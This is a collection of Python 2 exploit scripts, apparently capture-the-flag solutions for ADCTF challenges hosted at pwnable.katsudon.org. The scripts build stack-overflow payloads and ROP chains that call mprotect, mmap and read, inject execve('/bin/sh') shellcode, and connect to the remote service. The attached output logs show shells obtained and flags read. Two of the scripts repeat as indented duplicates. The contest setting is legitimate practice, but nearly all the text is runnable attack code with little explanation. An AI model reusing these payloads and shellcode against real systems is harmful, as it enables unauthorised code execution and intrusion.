hhc0null/day17.py

## day17.py
#!/usr/bin/env python2

from pwning import *
import sys

if len(sys.argv) != 2:
    print "Usage: {} [align]".format(sys.argv[0])

rhp = ("pwnable.katsudon.org", 32100)
#rhp = ("localhost", 32100)

# execve("/bin//sh", {"/bin//sh", NULL}, NULL);
sc = "\x0b\x31\xc0\xb0\x0f\x34\x04\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
#sc =  "\x6a\x0b\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0bxcd\x80"#\x00\x31\xc0\x40\xcd\x80"
align_size = int(sys.argv[1], 16)
scanf = 0x80483b0
dynamic = 0x8049f14
gotplt = 0x804a001
ppr = 0x804858e
ret = 0x8048346
badaddr = 0xbadadd12
sc_addr = gotplt

payload = ""
payload += "A"*0x18
payload += "A"*align_size
payload += "EBP!"
# scanf("%s", sc_addr);
payload += p(scanf)
payload += p(ppr)
payload += p(0x80485c7) # "%s"
payload += p(sc_addr)
# exec shellcode
payload += p(ret)
payload += p(sc_addr)
#payload += p(badaddr)
payload += '\0'
assert not '\0' in sc
assert not '\n' in sc

print "payload size: "+str(len(payload))
print "payload: "+repr(payload)

cli = RemoteConnector(rhp)
print cli.read()
cli.write(payload+sc)
print repr(cli.read())

cli.intaractive()

"""
payload size: 53
payload: 'AAAAAAAAAAAAAAAAAAAAAAAAEBP!\xb0\x83\x04\x08\x8e\x85\x04\x08\xc7\x85\x04\x08\x01\xa0\x04\x08F\x83\x04\x08\x01\xa0\x04\x08\x00'
name:
'hi, AAAAAAAAAAAAAAAAAAAAAAAAEBP!\xb0\x83\x04\x08\x8e\x85\x04\x08\xc7\x85\x04\x08\x01\xa0\x04\x08F\x83\x04\x08\x01\xa0\x04\x08\n'
ls
$ ls
flag
$ cat flag
ADCTF_Sc4NF_IS_PRe77Y_niCE
"""

## day20.py
#!/usr/bin/env python2

from pwning import *
import sys
import time

rhp = ("pwnable.katsudon.org", 28099)
#rhp = ("localhost", 28099)

badaddr = 0xbadadd12
syscall = 0x08048080
ret = 0x0804808e # ret  ;
sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
data1 = "A"*4
data2 = "A"*3

page_base = 0xa0000000
print "[*] page base address: "+hex(page_base)

stager  = ""
stager += "A"*0x10 # fill up buffer
# read(STDIN_FILENO, buf, 0x80);
stager += p(0x80480a7) # read data until 128 bytes
stager += "JUNK"*4
stager += p(0x080480ea) # add al, 0x5E ; ret  ;
stager += p(0x080480ea) # add al, 0x5E ; ret  ;
stager += p(0x080480eb) # pop esi ; ret  ;
stager += p(0x22)
# mmap2(page_base, 31, PROT_READ|PROT_WRITE|PROT_EXEC);
stager += p(syscall)
stager += p(0x080480bb) # add esp, 0x10 ; ret  ;
stager += p(page_base)
stager += p(0x1000)
stager += p(0x7)
stager += "JUNK"
stager += p(0x080480eb) # pop esi ; ret  ;
stager += p(syscall)
# read(STDIN_FILENO, buf, 0x80);
stager += p(0x80480a7) # read data until 128 bytes
stager += "JUNK"*4
# read(STDIN_FILENO, page_base, 31);
stager += p(syscall)
stager += p(page_base)
stager += p(STDIN_FILENO)
stager += p(page_base)
stager += p(len(sc))
stager += "JUNK"
stager += "!"*(0x80-len(stager))
#assert len(stager) == 0x80
print len(stager)

print "payload: "+repr(stager+data1+data2+sc)

remote = RemoteConnector(rhp)
print remote.read()
remote.write(stager)
try:
    remote.read()
except:
    pass
remote.write(data1)
try:
    remote.read()
except:
    pass
remote.write(data2)
try:
    remote.read()
except:
    pass
remote.write(sc)

remote.intaractive()

"""
[*] page base address: 0xa0000000L
128
payload: 'AAAAAAAAAAAAAAAA\xa7\x80\x04\x08JUNKJUNKJUNKJUNK\xea\x80\x04\x08\xea\x80\x04\x08\xeb\x80\x04\x08"\x00\x00\x00\x80\x80\x04\x08\xbb\x80\x04\x08\x00\x00\x00\xa0\x00\x10\x00\x00\x07\x00\x00\x00JUNK\xeb\x80\x04\x08\x80\x80\x04\x08\xa7\x80\x04\x08JUNKJUNKJUNKJUNK\x80\x80\x04\x08\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\xa0\x1c\x00\x00\x00JUNKAAAAAAA1\xc0Ph//shh/bin\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x801\xc0@\xcd\x80'
pwn me:
$ id
uid=1000(easypwn) gid=1000(easypwn) groups=1000(easypwn)
$ ls
flag
$ cat flag
ADCTF_175_345y_7o_cON7ROL_5Y5c4LL
"""

## day23_stage1.py
#!/usr/bin/env python2

from pwning import *
import binascii
import sys

if len(sys.argv) != 2:
    print "Usage: {} [align size]".format(sys.argv[0])
    sys.exit(0)

rhp = ("pwnable.katsudon.org", 33201)
#rhp = ("localhost", 33201)
align_size = int(sys.argv[1], 16)

ret = 0x80484fd
pppr = 0x0804855d # pop esi ; pop edi ; pop ebp ; ret  ;
read_plt = 0x08048340
mprotect_plt = 0x08048330
baddaddr = 0xbadadd12 # for debug

sc  = ""
# execve("/bin//sh", {"/bin//sh", NULL}, NULL);
sc += "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
#sc += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" # /bin/sh

stager  = ""
stager += p(ret)
stager += "A"*align_size
stager += "EBP!"
# mprotect(0x20000000, 0x400, PROT_READ|PROT_WRITE|PROT_EXEC);
stager += p(mprotect_plt)
stager += p(pppr)
stager += p(0x20000000)
stager += p(0x400)
stager += p(PROT_READ|PROT_WRITE|PROT_EXEC)
# read(STDIN_FILENO, 0x20000000, sizeof(sc));
stager += p(read_plt)
stager += p(pppr)
stager += p(STDIN_FILENO)
stager += p(0x20000000)
stager += p(len(sc))
# exec shellcode
stager += p(ret)
stager += p(0x20000000)
stager += "A"*(0x400-len(stager))

remote = RemoteConnector(rhp)
remote.write(stager)
remote.write(sc)

remote.intaractive()

## day23_stage2.py
#!/usr/bin/env python2

from pwning import *
import binascii
import sys
import base64

if len(sys.argv) != 2:
    print "Usage: {} [cmd]".format(sys.argv[0])
    sys.exit(0)

cmd = sys.argv[1]

retq = 0x400516
pppr = 0x0040068e # pop r13 ; pop r14 ; pop r15 ; ret  ;
read_plt = 0x0000000000400490
read_got = 0x601020
mprotect_plt = 0x00000000004004c0
mprotect_got = 0x601038

baddaddr = 0xbadadd12 # for debug

sc  = ""
sc += "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x8d\x42\x3b\x0f\x05"

def set_args(edi=0, rsi=0, rdx=0, addr=retq, rbx=0, rbp=0):
    sq  = ""
    sq += p(0x0040068a, t="<Q") # pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret  ;
    sq += p(rbx, t="<Q")
    sq += p(rbp, t="<Q")
    sq += p(addr, t="<Q")
    sq += p(rdx, t="<Q")
    sq += p(rsi, t="<Q")
    sq += p(edi, t="<Q")
    sq += p(0x400670, t="<Q") # mov rdx, r13 ; mov rsi, r14 ; mov edi, r15d ; callq (r12, rbx, 8)
    return sq

stager  = ""
stager += p(retq, "<Q")
stager += "EBP!EBP!"
# mprotect(0x20000000, 0x400, PROT_READ|PROT_WRITE|PROT_EXEC);
stager += set_args(0x20000000, 0x400, PROT_READ|PROT_WRITE|PROT_EXEC, mprotect_got-8*1, rbx=1, rbp=2)
stager += "JUNKJUNK"*7
# read(STDIN_FILENO, 0x20000000, sizeof(sc));
stager += set_args(STDIN_FILENO, 0x20000000, len(sc), read_got, rbx=0, rbp=1)
stager += "JUNKJUNK"*7
# exec shellcode
stager += p(0x20000000, t="<Q")
stager += "A"*(0x400-len(stager))

data = base64.b64encode(stager+sc+"\n{}\n".format(cmd))
sys.stdout.write(data)

"""
$ ls
flag
shellcodeme2
$ cat flag
$ echo FgVAAAAAAABFQlAhRUJQIYoGQAAAAAAAAQAAAAAAAAACAAAAAAAAADAQYAAAAAAABwAAAAAAAAAABAAAAAAAAAAAACAAAAAAcAZAAAAAAABKVU5LSlVOS0pVTktKVU5LSlVOS0pVTktKVU5LSlVOS0pVTktKVU5LSlVOS0pVTktKVU5LSlVOS4oGQAAAAAAAAAAAAAAAAAABAAAAAAAAACAQYAAAAAAAHQAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAcAZAAAAAAABKVU5LSlVOS0pVTktKVU5LSlVOS0pVTktKVU5LSlVOS0pVTktKVU5LSlVOS0pVTktKVU5LSlVOSwAAACAAAAAAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUgx0lJIuC9iaW4vL3NoUEiJ51JXSInmSI1COw8FCmNhdCBmbGFnCg==|base64 -d|./shellcodeme2
ADCTF_I_l0v3_tH15_4W350M3_m15T4K3
$ echo I got flag!
I got flag!
"""
	#!/usr/bin/env python2

	from pwning import *
	import sys

	if len(sys.argv) != 2:
	print "Usage: {} [align]".format(sys.argv[0])

	rhp = ("pwnable.katsudon.org", 32100)
	#rhp = ("localhost", 32100)

	# execve("/bin//sh", {"/bin//sh", NULL}, NULL);
	sc = "\x0b\x31\xc0\xb0\x0f\x34\x04\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
	#sc = "\x6a\x0b\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0bxcd\x80"#\x00\x31\xc0\x40\xcd\x80"
	align_size = int(sys.argv[1], 16)
	scanf = 0x80483b0
	dynamic = 0x8049f14
	gotplt = 0x804a001
	ppr = 0x804858e
	ret = 0x8048346
	badaddr = 0xbadadd12
	sc_addr = gotplt

	payload = ""
	payload += "A"*0x18
	payload += "A"*align_size
	payload += "EBP!"
	# scanf("%s", sc_addr);
	payload += p(scanf)
	payload += p(ppr)
	payload += p(0x80485c7) # "%s"
	payload += p(sc_addr)
	# exec shellcode
	payload += p(ret)
	payload += p(sc_addr)
	#payload += p(badaddr)
	payload += '\0'
	assert not '\0' in sc
	assert not '\n' in sc

	print "payload size: "+str(len(payload))
	print "payload: "+repr(payload)

	cli = RemoteConnector(rhp)
	print cli.read()
	cli.write(payload+sc)
	print repr(cli.read())

	cli.intaractive()

	"""
	payload size: 53
	payload: 'AAAAAAAAAAAAAAAAAAAAAAAAEBP!\xb0\x83\x04\x08\x8e\x85\x04\x08\xc7\x85\x04\x08\x01\xa0\x04\x08F\x83\x04\x08\x01\xa0\x04\x08\x00'
	name:
	'hi, AAAAAAAAAAAAAAAAAAAAAAAAEBP!\xb0\x83\x04\x08\x8e\x85\x04\x08\xc7\x85\x04\x08\x01\xa0\x04\x08F\x83\x04\x08\x01\xa0\x04\x08\n'
	ls
	$ ls
	flag
	$ cat flag
	ADCTF_Sc4NF_IS_PRe77Y_niCE
	"""
	#!/usr/bin/env python2

	from pwning import *
	import binascii
	import sys

	if len(sys.argv) != 2:
	print "Usage: {} [align size]".format(sys.argv[0])
	sys.exit(0)

	rhp = ("pwnable.katsudon.org", 33201)
	#rhp = ("localhost", 33201)
	align_size = int(sys.argv[1], 16)

	ret = 0x80484fd
	pppr = 0x0804855d # pop esi ; pop edi ; pop ebp ; ret ;
	read_plt = 0x08048340
	mprotect_plt = 0x08048330
	baddaddr = 0xbadadd12 # for debug

	sc = ""
	# execve("/bin//sh", {"/bin//sh", NULL}, NULL);
	sc += "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
	#sc += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" # /bin/sh

	stager = ""
	stager += p(ret)
	stager += "A"*align_size
	stager += "EBP!"
	# mprotect(0x20000000, 0x400, PROT_READ\|PROT_WRITE\|PROT_EXEC);
	stager += p(mprotect_plt)
	stager += p(pppr)
	stager += p(0x20000000)
	stager += p(0x400)
	stager += p(PROT_READ\|PROT_WRITE\|PROT_EXEC)
	# read(STDIN_FILENO, 0x20000000, sizeof(sc));
	stager += p(read_plt)
	stager += p(pppr)
	stager += p(STDIN_FILENO)
	stager += p(0x20000000)
	stager += p(len(sc))
	# exec shellcode
	stager += p(ret)
	stager += p(0x20000000)
	stager += "A"*(0x400-len(stager))

	remote = RemoteConnector(rhp)
	remote.write(stager)
	remote.write(sc)

	remote.intaractive()